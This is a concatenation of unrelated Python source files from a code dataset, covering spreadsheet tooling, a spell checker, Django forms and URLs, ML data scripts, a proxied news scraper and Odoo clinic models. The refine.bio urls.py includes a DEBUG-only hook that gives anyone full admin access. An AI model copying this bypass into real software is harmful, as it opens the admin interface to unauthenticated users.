else:\r\n ws.cell(row=r, column=1).value = taxonomy[3]\r\n r +=1\r\n\r\n cfill(wb[\"Awareness\"])\r\n cfill(wb[\"Interest\"])\r\n cfill(wb[\"Consideration\"])\r\n cfill(wb[\"Evaluation\"])\r\n\r\n #Export to Excell\r\n wb.save(filename=\"Build Out.xlsx\")\r\n \r\n if radio == 2:\r\n ws1 = ws.title = \"Build\"\r\n #keyword fill function\r\n def kfill(worksheet_name):\r\n ws = worksheet_name \r\n r=2\r\n for word in info[0]:\r\n ws.cell(row=r, column=3).value = word\r\n r+=1\r\n #fill keyword sett to column\r\n kfill(wb[\"Build\"])\r\n\r\n def column_title(worksheet_name):\r\n for ws in wb:\r\n ws['A1'] = 'Campaign'\r\n ws['B1'] = 'Ad Group'\r\n ws['C1'] = 'Keyword'\r\n ws['D1'] = 'Match Type'\r\n ws['E1'] = 'Max CPC'\r\n ws['F1'] = 'Final URL Google'\r\n ws['G1'] = 'Final URL Bing'\r\n ws['H1'] = 'BN/UB'\r\n\r\n #name each column\r\n column_title(wb[\"Build\"])\r\n\r\n \r\n \r\n\r\n \r\n\r\nbutton1 = tk.Button(text='Create Build', command=createBuild, anchor ='w')\r\nbutton1.pack()\r\n\r\nroot.mainloop()","sub_path":"Build_Out_V4.py","file_name":"Build_Out_V4.py","file_ext":"py","file_size_in_byte":23152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"301849309","text":"import os.path as osp\nimport sys\nfrom typing import Callable, List, Optional, Sequence\n\nimport numpy as np\n\nfrom hunspell import HunSpell\nfrom textdistance import levenshtein, jaro_winkler, needleman_wunsch\n\n\nclass SpellChecker:\n def __init__(\n self,\n dict_path: str = './dictionaries/en',\n num_suggestions: int = 5,\n distances: Optional[Sequence[Callable[[str, str], float]]] = None\n ) -> None:\n self._hunspell = HunSpell(\n osp.join(dict_path, 'index.dic'), osp.join(dict_path, 'index.aff')\n )\n self._num_suggestions = num_suggestions\n self._distances = distances or [\n levenshtein.normalized_distance,\n jaro_winkler.normalized_distance,\n needleman_wunsch.normalized_distance\n ]\n\n def _compute_distances(self, word: str, candidates: str) -> List[float]:\n return [sum(d(word, c) for d in self._distances) for c in candidates]\n\n def suggest_if_needed(self, word: str) -> List[str]:\n if self._hunspell.spell(word):\n return []\n candidates = self._hunspell.suggest(word)\n distances = self._compute_distances(word, candidates)\n if self._num_suggestions < len(candidates):\n topk_idx = np.argpartition(\n distances, self._num_suggestions\n )[:self._num_suggestions]\n\n candidates = [candidates[i] for i in topk_idx]\n distances = [distances[i] for i in topk_idx]\n\n return [x[1] for x in sorted(zip(distances, candidates))]\n\n\ndef spell_check():\n words = sys.argv[1:]\n spell_checker = SpellChecker()\n\n for word in words:\n suggestions = spell_checker.suggest_if_needed(word)\n if len(suggestions) != 0:\n print(word.ljust(max(map(len, words))), '| Suggestions:', suggestions)\n else:\n print(\n word.ljust(max(map(len, words))),\n '| The word is correct or nothing to suggest!'\n )\n","sub_path":"spell_checker.py","file_name":"spell_checker.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"119835759","text":"import os\nfrom django.db.models import FileField\nfrom django.forms import forms\nfrom django.template.defaultfilters import filesizeformat\nfrom django.utils.translation import ugettext_lazy as _\n\nclass AudioField(FileField):\n \"\"\"\n Same as FileField, but you can specify:\n * content_types - list containing allowed content_types. Example: ['application/pdf', 'image/jpeg']\n * max_upload_size - a number indicating the maximum file size allowed for upload.\n 2.5MB - 2621440\n 5MB - 5242880\n 10MB - 10485760\n 20MB - 20971520\n 50MB - 5242880\n 100MB 104857600\n 250MB - 214958080\n 500MB - 429916160\n \"\"\"\n def __init__(self, *args, **kwargs):\n FileField.__init__(self)\n self.content_types = '' #kwargs.pop(\"content_types\")\n self.max_upload_size = 20971520 #kwargs.pop(\"max_upload_size\")\n super(AudioField, self).__init__(*args, **kwargs)\n\n def clean(self, *args, **kwargs): \n data = super(AudioField, self).clean(*args, **kwargs)\n if data is None:\n if self.required:\n raise forms.ValidationError(\"This File is required\")\n else:\n return\n else:\n file = data.file\n try:\n content_type = file.content_type\n if content_type.split('/')[0]=='audio':\n if file._size > self.max_upload_size:\n raise forms.ValidationError(_('Please keep filesize under %s. Current filesize %s') % (filesizeformat(self.max_upload_size), filesizeformat(file._size)))\n else:\n raise forms.ValidationError(_('Filetype not supported.'))\n except AttributeError:\n pass \n return data\n\n\nclass ExtFileField(forms.FileField):\n \"\"\"\n Same as forms.FileField, but you can specify a file extension whitelist.\n\n >>> from django.core.files.uploadedfile import SimpleUploadedFile\n >>>\n >>> t = ExtFileField(ext_whitelist=(\".pdf\", \".txt\"))\n >>>\n >>> t.clean(SimpleUploadedFile('filename.pdf', 'Some File Content'))\n >>> t.clean(SimpleUploadedFile('filename.txt', 'Some File Content'))\n >>>\n >>> t.clean(SimpleUploadedFile('filename.exe', 'Some File Content'))\n Traceback (most recent call last):\n ...\n ValidationError: [u'Not allowed filetype!']\n \"\"\"\n def __init__(self, *args, **kwargs):\n ext_whitelist = kwargs.pop(\"ext_whitelist\")\n self.ext_whitelist = [i.lower() for i in ext_whitelist]\n\n super(ExtFileField, self).__init__(*args, **kwargs)\n\n def clean(self, *args, **kwargs):\n data = super(ExtFileField, self).clean(*args, **kwargs)\n if data is None:\n if self.required:\n raise forms.ValidationError(\"This File is required\")\n else:\n return\n else:\n filename = data.name\n ext = os.path.splitext(filename)[1]\n ext = ext.lower()\n if ext not in self.ext_whitelist:\n raise forms.ValidationError(\"Not allowed filetype!\")\n\n#-------------------------------------------------------------------------\n\nif __name__ == \"__main__\":\n import doctest, datetime\n doctest.testmod()\n","sub_path":"being/myfields.py","file_name":"myfields.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"522791263","text":"# reverse a string\nno_of_chars = 256\n\n \ndef reverse(string):\n left = 0 \n right = len(string) - 1\n\n string = list(string)\n\n\n while left < right:\n#swap\n temp = string[left]\n string[left] = string[right]\n string[right] = temp\n\n left+=1\n right-=1\n \n temp1 = ''\n for x in range(len(string)):\n temp1 += string[x]\n\n print(temp1)\n\n\n \n \n\n# Driver code \nif __name__ == \"__main__\": \n\n string = \"nivrutti\"\n\n reverse(string)\n \n\n\n'''\nSudiptos approach\n\n\nTime complexity = O(n)\n\nSpace Compelxity = O(n)\n\n\n\n\none line code ==> string[::-1]\n\n\n'''","sub_path":"mycodes/strings/p4/p4.py","file_name":"p4.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"567631661","text":"from django.test import LiveServerTestCase\nimport sys\nfrom selenium import webdriver\n\nurls = {\n \"local\": \"http://localhost:8000/\",\n \"prod\": \"http://ec2-52-90-175-114.compute-1.amazonaws.com/\"\n}\n\n\nclass HomePageTest(LiveServerTestCase):\n @classmethod\n def setUpClass(cls):\n for arg in sys.argv:\n if 'liveserver' in arg:\n env = arg.split(\"=\")[1]\n if env in urls:\n cls.server_url = urls[env]\n print(\"Running functional tests for {0} on {1}\".format(env, cls.server_url))\n return\n else:\n print(\"Unknown environment {0}, using local instead.\".format(env))\n break\n super().setUpClass()\n cls.server_url = urls[\"local\"]\n\n @classmethod\n def tearDownClass(cls):\n if cls.server_url == urls[\"local\"]:\n super().tearDownClass()\n\n def setUp(self):\n self.browser = webdriver.Chrome()\n\n def test_home_page_shows_map(self):\n self.browser.get(self.server_url)\n self.assertIn(\"Azume\", self.browser.title)\n self.assertTrue(self.browser.find_element_by_class_name(\"gm-style\"), \"Google maps not found.\")\n self.browser.quit()\n\n","sub_path":"src/web/azume/functional_tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"154870833","text":"import json\nimport os\n\nimport h5py\nimport pandas as pd\n\nfrom config import MSVDSplitConfig as C\n\n\ndef load_metadata():\n df = pd.read_csv(C.caption_fpath)\n df = df[df['Language'] == 'English']\n df = df[pd.notnull(df['Description'])]\n df = df.reset_index(drop=True)\n return df\n\n\ndef load_videos():\n f = h5py.File(C.video_fpath, 'r')\n return f\n\n\ndef load_splits():\n with open('data/MSVD/metadata/train.list', 'r') as fin:\n train_vids = json.load(fin)\n with open('data/MSVD/metadata/valid.list', 'r') as fin:\n val_vids = json.load(fin)\n with open('data/MSVD/metadata/test.list', 'r') as fin:\n test_vids = json.load(fin)\n return train_vids, val_vids, test_vids\n\n\ndef save_video(fpath, vids, videos):\n fout = h5py.File(fpath, 'w')\n for vid in vids:\n fout[vid] = videos[vid].value\n fout.close()\n print(\"Saved {}\".format(fpath))\n\n\ndef save_metadata(fpath, vids, metadata_df):\n vid_indices = [ i for i, r in metadata_df.iterrows() if \"{}_{}_{}\".format(r[0], r[1], r[2]) in vids ]\n df = metadata_df.iloc[vid_indices]\n df.to_csv(fpath)\n print(\"Saved {}\".format(fpath))\n\n\ndef split():\n videos = load_videos()\n metadata = load_metadata()\n\n train_vids, val_vids, test_vids = load_splits()\n\n save_video(C.train_video_fpath, train_vids, videos)\n save_video(C.val_video_fpath, val_vids, videos)\n save_video(C.test_video_fpath, test_vids, videos)\n\n save_metadata(C.train_metadata_fpath, train_vids, metadata)\n save_metadata(C.val_metadata_fpath, val_vids, metadata)\n save_metadata(C.test_metadata_fpath, test_vids, metadata)\n\n\nif __name__ == \"__main__\":\n split()\n\n","sub_path":"torchOnVideo/cleanup/splits/MSVD.py","file_name":"MSVD.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"388489546","text":"import test_pb2 as p\n\ndef handler(conn, event):\n try:\n d = p.MyDict()\n d.turn = \"pow\"\n d.pow = \"scram\"\n obj = d.SerializeToString()\n\n e = p.MyDict()\n e.ParseFromString(obj)\n return \"Recoverd obj. Turn: \" + e.turn\n except Exception as e:\n return {'error': str(e)} \n","sub_path":"mm_lambdas/proto_test/lambda_func.py","file_name":"lambda_func.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"50714089","text":"def conv_groups_fn(params):\n return [param.view(param.shape[:2] + (-1,)).transpose(2, 1) for param in params]\n\ndef column_groups_fn(params):\n return [param.unsqueeze(0) for param in params]\n\ndef resnet_groups(model, args):\n to_prox_conv, to_prox_linear = [], []\n remaining = []\n\n for name, param in model.named_parameters():\n if 'weight' in name:\n if param.ndim == 4:\n to_prox_conv.append(param)\n elif param.ndim == 2:\n to_prox_linear.append(param)\n else:\n remaining.append(param) # BN weight\n else:\n remaining.append(param)\n\n optimizer_grouped_parameters = [\n {\n 'params': to_prox_conv,\n 'weight_decay': args.weight_decay,\n 'groups_fn': conv_groups_fn\n },\n {\n 'params': to_prox_linear,\n 'weight_decay': args.weight_decay,\n 'groups_fn': column_groups_fn\n }\n ]\n if remaining:\n optimizer_grouped_parameters.append({\n 'params': remaining,\n 'weight_decay': args.weight_decay,\n 'groups_fn': None\n })\n\n return optimizer_grouped_parameters\n","sub_path":"proxssi/groups/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"614827487","text":"import argparse\nimport json\nimport os\nimport sys\n\n\ndef read_file_skip_header_lazy(file):\n with open(file, \"r\") as f:\n next(f)\n for line in f.readlines():\n yield line\n\n\ndef _read_actual_file(actual_file):\n actual_items = {}\n for line in read_file_skip_header_lazy(actual_file):\n url, logo_url = line.split(\",\")\n url, logo_url = url.strip().strip(\"/\"), logo_url.strip().strip(\"/\")\n if not actual_items.get(url):\n actual_items[url] = logo_url\n return actual_items\n\n\ndef _read_json_file(json_file):\n predicted_items = {}\n with open(json_file) as f:\n data = json.load(f)\n for line in data:\n url, logo_url = line['webpage_url'].strip().strip(\"/\"), line['logo_url'].strip().strip(\"/\")\n if not predicted_items.get(url):\n predicted_items[url] = logo_url\n return predicted_items\n\n\ndef compare(actual_file, json_file):\n actual_items = _read_actual_file(actual_file)\n predicted_items = _read_json_file(json_file)\n\n result = {\n 'Equal': [],\n 'Not Equal': [],\n 'Not Found': [],\n }\n\n for url, logo_url in actual_items.items():\n predicted_logo_url = predicted_items.get(url)\n if predicted_logo_url == logo_url:\n result['Equal'].append(url)\n elif not predicted_logo_url:\n result['Not Found'].append(url)\n else:\n result['Not Equal'].append(url)\n\n for key, items in result.items():\n print(\"-\" * 124)\n print(\"| {} | {} |\\n\".format(key, len(items)))\n for item in items:\n print(\"| {:<120} |\".format(item))\n print(\"-\" * 124)\n print()\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Checker for actual vs scraped logo url\")\n parser.add_argument(\"-actual\", help=\"Location of actual txt file\", required=True)\n parser.add_argument(\"-json\", help=\"Location of JSON file\", required=True)\n args = parser.parse_args()\n\n def file_abs_path(file_name):\n return os.path.join(os.path.dirname(os.path.realpath('__file__')), file_name)\n\n actual_file = file_abs_path(args.actual)\n if not os.path.isfile(actual_file):\n print(\"Provide the correct actual file.\")\n sys.exit()\n\n json_file = file_abs_path(args.json)\n if not os.path.isfile(json_file):\n print(\"Provide the correct JSON file.\")\n sys.exit()\n\n compare(actual_file, json_file)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"159790682","text":"from pcfg import PCFG\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--corpus\", help=\"training treebank corpus\", type=str)\nparser.add_argument(\"--sentences\", help=\"raw token sentences\", type=str)\nparser.add_argument(\"--outfile\", help=\"name of the output file\", type=str)\nargs = parser.parse_args()\n\ngrammar = PCFG(args.corpus)\ngrammar.parse_corpus()\ngrammar.predict(args.sentences, args.outfile)\n","sub_path":"parser/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"115219732","text":"import urllib.request # библиотеки для открытия url\nimport urllib.error # классы исключения библиотеки urllib.request\nfrom datetime import date # библиотека даты и времени\nimport re # библиотека регулярных выражений\nimport csv # библиотека записи csv-файлах\n\n\nurl = 'https://www.zakon.kz/news' # веб-страница парсинга\nproxy = {'https': 'https://185.212.128.43:3128'} # свободный прокси\n\n# через бесконечный цикл запрос проходит через свободный прокси с обработкой исключений\nwhile True:\n try:\n proxy_support = urllib.request.ProxyHandler(proxy)\n opener = urllib.request.build_opener(proxy_support)\n urllib.request.install_opener(opener)\n req = urllib.request.Request(url)\n resp = urllib.request.urlopen(req)\n except urllib.error.HTTPError:\n continue\n except urllib.error.URLError:\n continue\n break\n\n\nrespData = resp.read() # html-текст веб-страницы\nrespData = respData.decode(\"utf-8\") # байтовый тип конвертируем в string\n# comment_nums = re.findall(r'(.*?)',str(respData))\nparagraphs = re.findall(r'',str(respData)) # через рег. выражения находим все ссылки\ndates = re.findall(r')',str(respData)) # через рег. выражения находим все времена\n# сохраняем в массив времена из dates\npubDates = []\nfor i in dates:\n if i.__contains__('n3'):\n pubDates.append(str(re.split(\">|<\",i)[1]))\n\niter = 0 # итерируемая переменная для вызова элементов pubDates\nf = open('zakon.csv','w',newline='',encoding=\"utf-8\") # открываем новый файл zakon.csv для записи с кодировкой utf-8\nwriter = csv.writer(f,delimiter=',', # функция записи данных в файл\n quoting=csv.QUOTE_MINIMAL)\nwriter.writerow(['Заголовок','Текст','Дата публикации']) # записываем первую строку - названия столбцов\n\n# проходим через все ссылки\nfor each in paragraphs:\n if each.__contains__(\"html\") and each.__contains__(\"target='_blank\"): # открываем лишь ссылки на новостные страницы\n head = re.split(\"/|>|'\",each)[8] # выбираем заголовок из ссылки\n # link = \"https://www.zakon.kz/\"+re.split(\"/|>|'\",each)[6]\n text = \"\"\n # сохраняем весь текст в переменную text, на каждый запрос переходим через прокси\n while True:\n try:\n proxy_support = urllib.request.ProxyHandler(proxy)\n opener = urllib.request.build_opener(proxy_support)\n urllib.request.install_opener(opener)\n curReq = urllib.request.Request(\"https://www.zakon.kz/\"+re.split(\"/|>|'\",each)[6])\n curResp = urllib.request.urlopen(curReq)\n except urllib.error.HTTPError:\n continue\n except urllib.error.URLError:\n continue\n break\n curRespData = curResp.read()\n curRespData = curRespData.decode(\"utf-8\")\n curParagraphs = re.findall('

(.*?)

',str(curRespData)) # находим текст в текстовых абзацах\n # сохраняем каждый текст\n for y in curParagraphs:\n text += re.sub('<[^>]+>','',str(y)) # удаляем все ссылки и теги из текста\n # print(re.sub('<[^>]+>','',str(y)))\n writer.writerow([head,text,str(date.today())+\" \"+pubDates[iter]]) # записываем все получившиеся данные в следующую строку\n iter += 1 # присваиваем +1 для перехода на следующую дату\nf.close() # закрываем файл\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":4239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"645835723","text":"from mesa import Agent\nfrom agents.import_agents import *\n\nclass WaterAgent(Agent):\n def __init__(self, unique_id, model, specie, agent_type):\n super().__init__(unique_id, model)\n self.type = agent_type\n self.gender = None\n self.specie=specie\n self.health = 100","sub_path":"app/agents/water_agent.py","file_name":"water_agent.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"495582600","text":"from django.conf import settings\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom django.urls import include, path\nfrom django.views.generic import RedirectView\nfrom rest_framework import permissions\n\nfrom drf_yasg import openapi\nfrom drf_yasg.views import get_schema_view\n\nfrom .views import (\n AboutStats,\n APITokenView,\n CompendiumResultDetails,\n CompendiumResultList,\n ComputationalResultsList,\n ComputedFilesList,\n CreateApiTokenView,\n CreateDatasetView,\n DatasetView,\n DownloaderJobList,\n ExperimentDetail,\n ExperimentDocumentView,\n ExperimentList,\n FailedDownloaderJobStats,\n FailedProcessorJobStats,\n InstitutionList,\n OrganismList,\n OriginalFileList,\n PlatformList,\n ProcessorJobList,\n ProcessorList,\n QNTargetsAvailable,\n QNTargetsDetail,\n SampleDetail,\n SampleList,\n Stats,\n SurveyJobList,\n TranscriptomeIndexDetail,\n TranscriptomeIndexList,\n handle404error,\n handle500error,\n)\n\n\n# This provides _public_ access to the /admin interface!\n# Enabling this by setting DEBUG to true this will allow unauthenticated access to the admin interface.\n# Very useful for debugging (since we have no User accounts), but very dangerous for prod!\nclass AccessUser:\n has_module_perms = has_perm = __getattr__ = lambda s, *a, **kw: True\n\n\nif settings.DEBUG:\n admin.site.has_permission = lambda r: setattr(r, \"user\", AccessUser()) or True\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Refine.bio API\",\n default_version=\"v1\",\n description=\"\"\"\nrefine.bio is a multi-organism collection of genome-wide transcriptome or gene expression data that has been obtained from publicly available repositories and uniformly processed and normalized. refine.bio allows biologists, clinicians, and machine learning researchers to search for experiments from different source repositories all in one place and build custom data sets for their questions of interest.\n\nThe swagger-ui view can be found [here](http://api.refine.bio/swagger/).\n\nThe ReDoc view can be found [here](http://api.refine.bio/).\n\nAdditional documentation can be found at [docs.refine.bio](http://docs.refine.bio/en/latest/).\n\n### Questions/Feedback?\n\nIf you have a question or comment, please [file an issue on GitHub](https://github.com/AlexsLemonade/refinebio/issues) or send us an email at [ccdl@alexslemonade.org](mailto:ccdl@alexslemonade.org).\n \"\"\",\n terms_of_service=\"https://www.refine.bio/terms\",\n contact=openapi.Contact(email=\"ccdl@alexslemonade.org\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n public=True,\n permission_classes=(permissions.AllowAny,),\n)\n\nurlpatterns = [\n url(\n r\"^(?Pv1)/\",\n include(\n [\n # Primary search and filter interface\n url(r\"^search/$\", ExperimentDocumentView.as_view({\"get\": \"list\"}), name=\"search\"),\n url(r\"^experiments/$\", ExperimentList.as_view(), name=\"experiments\"),\n url(\n r\"^experiments/(?P.+)/$\",\n ExperimentDetail.as_view(),\n name=\"experiments_detail\",\n ),\n url(r\"^samples/$\", SampleList.as_view(), name=\"samples\"),\n url(\n r\"^samples/(?P.+)/$\",\n SampleDetail.as_view(),\n name=\"samples_detail\",\n ),\n url(r\"^organisms/$\", OrganismList.as_view(), name=\"organisms\"),\n url(r\"^platforms/$\", PlatformList.as_view(), name=\"platforms\"),\n url(r\"^institutions/$\", InstitutionList.as_view(), name=\"institutions\"),\n url(r\"^processors/$\", ProcessorList.as_view(), name=\"processors\"),\n # Deliverables\n url(r\"^dataset/$\", CreateDatasetView.as_view(), name=\"create_dataset\"),\n url(r\"^dataset/(?P[0-9a-f-]+)/$\", DatasetView.as_view(), name=\"dataset\"),\n url(r\"^token/$\", CreateApiTokenView.as_view(), name=\"token\"),\n url(r\"^token/(?P[0-9a-f-]+)/$\", APITokenView.as_view(), name=\"token_id\"),\n # Jobs\n url(r\"^jobs/survey/$\", SurveyJobList.as_view(), name=\"survey_jobs\"),\n url(r\"^jobs/downloader/$\", DownloaderJobList.as_view(), name=\"downloader_jobs\"),\n url(r\"^jobs/processor/$\", ProcessorJobList.as_view(), name=\"processor_jobs\"),\n # Dashboard Driver\n url(r\"^stats/$\", Stats.as_view(), name=\"stats\"),\n url(\n r\"^stats/failures/downloader$\",\n FailedDownloaderJobStats.as_view(),\n name=\"stats_failed_downloader\",\n ),\n url(\n r\"^stats/failures/processor$\",\n FailedProcessorJobStats.as_view(),\n name=\"stats_failed_processor\",\n ),\n url(r\"^stats-about/$\", AboutStats.as_view(), name=\"stats_about\"),\n # Transcriptome Indices\n path(\n \"transcriptome_indices/\",\n include(\n [\n path(\n \"\", TranscriptomeIndexList.as_view(), name=\"transcriptome_indices\"\n ),\n path(\n \"\",\n TranscriptomeIndexDetail.as_view(),\n name=\"transcriptome_indices_read\",\n ),\n ]\n ),\n ),\n # QN Targets\n url(r\"^qn_targets/$\", QNTargetsAvailable.as_view(), name=\"qn_targets_available\"),\n url(\n r\"^qn_targets/(?P.+)$\",\n QNTargetsDetail.as_view(),\n name=\"qn_targets\",\n ),\n # Computed Files\n url(r\"^computed_files/$\", ComputedFilesList.as_view(), name=\"computed_files\"),\n url(r\"^original_files/$\", OriginalFileList.as_view(), name=\"original_files\"),\n url(\n r\"^computational_results/$\", ComputationalResultsList.as_view(), name=\"results\"\n ),\n # Compendia\n url(r\"^compendia/$\", CompendiumResultList.as_view(), name=\"compendium_results\"),\n url(\n r\"^compendia/(?P[0-9]+)/$\",\n CompendiumResultDetails.as_view(),\n name=\"compendium_result\",\n ),\n # v1 api docs\n url(\n r\"^swagger/$\",\n schema_view.with_ui(\"swagger\", cache_timeout=0),\n name=\"schema_swagger_ui\",\n ),\n url(r\"^$\", schema_view.with_ui(\"redoc\", cache_timeout=0), name=\"schema_redoc\"),\n ]\n ),\n ),\n # Admin\n url(r\"^admin/\", admin.site.urls),\n # Redirect root urls to latest version api docs\n url(r\"^swagger/$\", RedirectView.as_view(url=\"/v1/swagger\")),\n url(r\"^$\", RedirectView.as_view(url=\"/v1\")),\n]\n\n# handle errors\nhandler404 = handle404error\nhandler500 = handle500error\n","sub_path":"api/data_refinery_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":7362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"137025690","text":"# coding:utf8\r\n'''\r\nCreated on 2015-02-14\r\n\r\n@author: liliurd\r\n'''\r\n\r\nfrom django.db import models\r\nfrom django.contrib.auth.models import User\r\n# Create your models here.\r\n\r\n\r\nclass UserInfo(models.Model):\r\n mail = models.CharField(unique=True, max_length=128, verbose_name=u'邮箱')\r\n name = models.CharField(db_index=True, null=True, blank=True, max_length=128, verbose_name=u'姓名')\r\n depart = models.CharField(db_index=True, max_length=128, blank=True, null=True, verbose_name=u'部门')\r\n first = models.DateTimeField(auto_now_add=True, verbose_name=u'首次登陆时间')\r\n latest = models.DateTimeField(auto_now=True, verbose_name=u'最新登陆时间')\r\n times = models.IntegerField(default=0, null=True, blank=True, verbose_name=u'登陆次数')\r\n options = models.TextField(blank=True, null=True, verbose_name=u'自定义')\r\n auth = models.IntegerField(db_index=True, default=0)\r\n\r\n class Meta:\r\n verbose_name = u\"用户信息\"\r\n verbose_name_plural = u\"用户信息\"\r\n\r\nclass Authorization(models.Model):\r\n user_id = models.IntegerField(db_index=True, default=0, verbose_name=u'用户id')\r\n work_id = models.IntegerField(db_index=True, default=0, verbose_name=u'业务id')\r\n admin = models.IntegerField(db_index=True, default=0, verbose_name=u'管理员')\r\n write = models.IntegerField(db_index=True, default=0, verbose_name=u'���权限')\r\n\r\n class Meta:\r\n unique_together = ((\"user_id\", \"work_id\"),)\r\n verbose_name = u\"用户权限\"\r\n verbose_name_plural = u\"用户权限\"","sub_path":"web_mgr/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"603941119","text":"from odoo import models, fields, api, _\n\nclass KategoriObat(models.Model):\n _name=\"nur_klinik.kategori_obat\"\n\n name=fields.Char(\n string=\"Kategori Obat\", required=True\n )\n\n deskripsi = fields.Text(\n string='Deskripsi Kategori Obat',\n )\n\nclass Obat(models.Model):\n _name=\"nur_klinik.obat\"\n\n name = fields.Char(\n string=\"Nama\",required=True,\n )\n\n kategori_obat_id = fields.Many2one(\n string='Kategori Obat',\n comodel_name='nur_klinik.kategori_obat',\n ondelete='restrict',\n )\n\n harga = fields.Integer(\n string=\"Harga Obat\"\n )\n\n stok = fields.Integer(\n string=\"Persediaan\",\n )\n\n image = fields.Binary(\n string='Gambar',\n )\n \n\n deskripsi = fields.Text(\n string='Deskripsi Obat',\n )\n \nclass Resep(models.Model):\n _name = \"nur_klinik.resep\"\n\n name = fields.Many2one(\n string='Nama Obat',\n comodel_name='nur_klinik.obat',\n ondelete='restrict',\n )\n\n pengambilan_resep_id = fields.Many2one(\n string='pemeriksaan ID',\n comodel_name='nur_klinik.pengambilan_resep',\n ondelete='cascade',\n )\n\n desc_resep = fields.Text(\n string='Resep konsumsi Obat',\n help=\"Takaran yang diberikan kepada pasien\",\n required=True,\n )\n\n harga = fields.Integer(\n compute='_compute_harga', \n string='Harga')\n \n @api.depends('name')\n def _compute_harga(self):\n for record in self:\n record.harga = record.name.harga\n\n deskripsi = fields.Text(\n compute='_pick_deskripsi', \n string='Deskripsi')\n \n @api.depends('name')\n def _pick_deskripsi(self):\n for record in self:\n record.deskripsi = record.name.deskripsi\n \n qty = fields.Integer(\n string='Jumlah Beli',\n required=True,\n )\n\n total_harga = fields.Integer(\n compute='_compute_jumlah_harga', \n string='Jumlah Harga')\n \n @api.depends('qty')\n def _compute_jumlah_harga(self):\n for record in self:\n record.total_harga = record.qty * record.harga\n ","sub_path":"models/obat.py","file_name":"obat.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"226995225","text":"# -------------------------------------------------------\n# Assignment 2\n# Written by Zejun Zhang (40021402)\n# For COMP 472 Section AI-X – Summer 2021\n# Team: Sonic_1\n# --------------------------------------------------------\n\nimport yaml\nimport math\nimport numpy as np\nimport enchant\nfrom sklearn.feature_extraction.text import CountVectorizer\n\n# ---------------- Tokenlize trainning data set -----------------\ncorpus_positive = []\ncorpus_negative = []\ncorpus = []\ntokenlize_list_positive = []\ntokenlize_list_negative = []\ntokenlize_list = []\nstop_list = []\nremove_list = []\ntotalPositiveNum = 0\ntotalNegativeNum = 0\n\n# Load reviews\nwith open('Demo/TrainingReviewSet.yaml','r') as yamlfile:\n# with open('t1.yaml','r') as yamlfile:\n database = yaml.safe_load(yamlfile) \n for k, v in database['Reviews'].items():\n # Append positive reviews in a list\n if database['Reviews'][k][\"p/n\"] == \"Positive\":\n if database['Reviews'][k][\"text\"] != \"default\":\n corpus_positive.append(database['Reviews'][k][\"text\"])\n\n # Append negative reviews in a list\n if database['Reviews'][k][\"p/n\"] == \"Negative\":\n if database['Reviews'][k][\"text\"] != \"default\":\n corpus_negative.append(database['Reviews'][k][\"text\"])\n\n # Append all reviews in a list\n corpus.append(database['Reviews'][k][\"text\"])\n\n# Load remove.txt into a list\nwith open(\"Demo/remove.txt\", \"r\") as remove:\n content = remove.read() \n stop_list = content.split()\n remove.close()\n\n# Convert to lowercase and tokenlize the words\nvectorizer_p = CountVectorizer(stop_words = stop_list)\nvectorizer_n = CountVectorizer(stop_words = stop_list)\nvectorizer = CountVectorizer(stop_words = stop_list)\n\ntoken_p = vectorizer_p.fit_transform(corpus_positive)\ntoken_n = vectorizer_n.fit_transform(corpus_negative)\ntoken = vectorizer.fit_transform(corpus)\n\n# Words list\ntokenlize_list_positive = vectorizer_p.get_feature_names()\ntokenlize_list_negative = vectorizer_n.get_feature_names()\ntokenlize_list = vectorizer.get_feature_names()\n\n# Get the frequency for each words in training set\nfrequency_list_p = token_p.toarray()\nfrequency_list_n = token_n.toarray()\n\n# Frequency list\nfrequency_p = frequency_list_p.sum(axis=0)\nfrequency_n = frequency_list_n.sum(axis=0)\n\n# Get total number of words in positive reviews\nfor x in frequency_p:\n totalPositiveNum += int(x)\n\n# Get total number of words in nagetive reviews\nfor y in frequency_n:\n totalNegativeNum += int(y)\n# ---------------------------------------------------------------\n\n# # 